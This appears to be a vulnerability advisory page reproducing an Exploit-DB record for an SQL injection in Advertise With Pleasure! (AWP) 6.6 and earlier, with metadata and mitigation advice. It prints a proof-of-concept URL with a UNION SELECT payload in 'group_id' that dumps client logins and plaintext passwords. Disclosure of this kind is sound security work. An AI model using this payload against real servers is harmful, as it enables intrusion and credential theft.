Advertise With Pleasure! (AWP)

vendor:

Advertise With Pleasure!

by:

Robert Cooper

7,5

CVSS

HIGH

SQL Injection

CWE

Product Name: Advertise With Pleasure!

Affected Version From: 6.6 and earlier

Affected Version To: N/A

Patch Exists: YES

Related CWE: N/A

CPE: a:guruperl:advertise_with_pleasure!

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Linux/Windows 7

2014

Advertise With Pleasure! (AWP) <= 6.6 - SQL Injection vulnerability

A SQL injection vulnerability exists in Advertise With Pleasure! (AWP) version 6.6 and earlier. An attacker can exploit this vulnerability to gain access to plaintext passwords stored in the database. This is done by sending a specially crafted HTTP request to the vulnerable server containing malicious SQL code in the 'group_id' parameter.

Mitigation:

Upgrade to the latest version of Advertise With Pleasure! (AWP) or apply the appropriate patch.

Source

Exploit-DB raw data:

# Exploit Title: Advertise With Pleasure! (AWP) <= 6.6 - SQL Injection vulnerability
# Date: 12/02/2014
# Author: Robert Cooper (robertc[at]areyousecure.net)
# Software Link: http://www.guruperl.net/products/awppro/
# Tested on: [Linux/Windows 7]
# Vulnerable Parameter: group_id=
 
##############################################################

PoC:

http://server/cgi/client.cgi?act=list_zone&group_id=1'

http://server/cgi/client.cgi?act=list_zone&group_id=1 union all select 1,2,group_concat(id,0x3a,login,0x3a,password,0x0a),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 from awp_ad_client--
 
(Passwords are stored in plaintext) 

##############################################################

http://www.areyousecure.net